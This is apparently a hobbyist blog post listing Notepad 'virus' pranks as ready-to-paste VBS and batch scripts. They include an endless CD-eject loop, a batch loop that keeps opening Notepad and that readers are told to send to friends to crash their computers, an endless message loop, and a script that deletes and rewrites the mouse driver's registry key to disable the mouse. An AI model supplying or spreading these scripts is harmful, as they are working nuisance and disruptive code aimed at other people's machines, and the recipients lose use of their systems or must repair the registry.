Header Ads

Breaking News
recent

Fun With Notepad -2

Hello friends my last post was about notepad tricks . my many friends liked it and now i am gonna tell you some more exciting tricks and Iam sure you all are gonna love this post
So here we go................................
The first i my personnel favorite  a very annoying and scary virus that you can make with notepad

1. A CD Virus from Notepad (continuously pop out CD Drive)

you just have to open notepad and paste this code 
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
and save it as "virus.vbs"
If you accidentally open this file in your system, your cd pop-out continuously. For closing this shit, you need to reboot your Windows Computer.

2. Open 100s of Notepad Tab in Your Computer for Crashing Friend Computer.

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as “Unlimitednotepad.bat” and send it to your friends.

3. Create Matrix Movie Computer Screen Effects in Your Computer


@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
Save the file name as”matrix .bat ” in your Computer.

4. Constantly Repeat Notepad Messages


@ECHO off
:Begin
msg * Hi neeraj
msg * Are you watching cartoon?
msg * I am god!
msg * Lets have some fun!
msg * Because you have been o-w-n-e-d
GOTO BEGIN

Save the file name but with “continue.bat” extension in your computer. When you open this file in your computer, you see message line by line without type anything.
here my friends you can change all the massages in the code as you want

5. Disable the Mouse Controls in Computer

rem Disable Mouse
set key=”HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass”
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
Never try this trick in your Computer , because these trick disable your mouse controls in your computer.
Save this file as “disablemouse.bat” in your computer.
caution: these all stuff is just for knowledge purpose do not try this things to harm any one



No comments:

Psycho Cyborg. Powered by Blogger.